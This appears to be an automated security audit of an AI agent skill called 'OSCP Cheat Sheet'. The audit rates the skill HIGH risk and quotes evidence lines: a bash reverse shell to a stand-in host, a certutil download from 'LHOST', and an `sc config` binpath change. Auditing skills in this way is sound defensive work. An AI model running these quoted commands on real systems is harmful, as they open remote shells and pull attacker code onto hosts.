OSCP Cheat Sheet
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH
Categories: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
- REMOTE_CODE_EXECUTION (HIGH): The skill contains multiple 'one-liner' reverse shell payloads in Bash, Python, and PowerShell. These are designed to provide remote command-line access to an attacker.
  - Evidence: Section 5 (Exploitation) includes `bash -i >& /dev/tcp/KALI/443 0>&1` and a PowerShell TCPClient script.
- COMMAND_EXECUTION (HIGH): The skill provides a comprehensive list of commands for system enumeration, service exploitation, and Active Directory attacks.
  - Evidence: Sections 3, 4, 6, and 7 detail commands for directory traversal, SQL injection, and modifying service configurations (e.g., `sc config SERVICE binpath=`).
- EXTERNAL_DOWNLOADS (MEDIUM): It instructs the agent/user on how to download files (likely malware or enumeration scripts) from remote hosts using tools like certutil, powershell, wget, and curl.
  - Evidence: Section 2 (File Transfers) demonstrates using `certutil -urlcache -split -f "http://LHOST/file"` and `Invoke-WebRequest`.
Recommendations
- AI detected serious security threats
Audit Metadata